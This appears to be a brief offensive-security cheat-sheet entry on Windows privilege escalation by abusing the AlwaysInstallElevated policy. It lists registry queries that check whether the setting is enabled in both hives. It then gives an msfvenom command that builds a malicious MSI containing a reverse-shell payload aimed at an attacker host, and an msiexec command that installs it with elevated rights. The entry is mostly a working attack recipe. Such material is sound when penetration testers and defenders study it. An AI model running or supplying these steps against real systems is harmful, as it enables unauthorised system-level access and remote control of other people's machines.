>_ shadow.red

AlwaysInstallElevated

Privilege Escalation Windows Misc windows

Check both hives

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Both should return 0x1.

Generate a malicious MSI

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o evil.msi

Install elevated

msiexec /i C:\path\to\evil.msi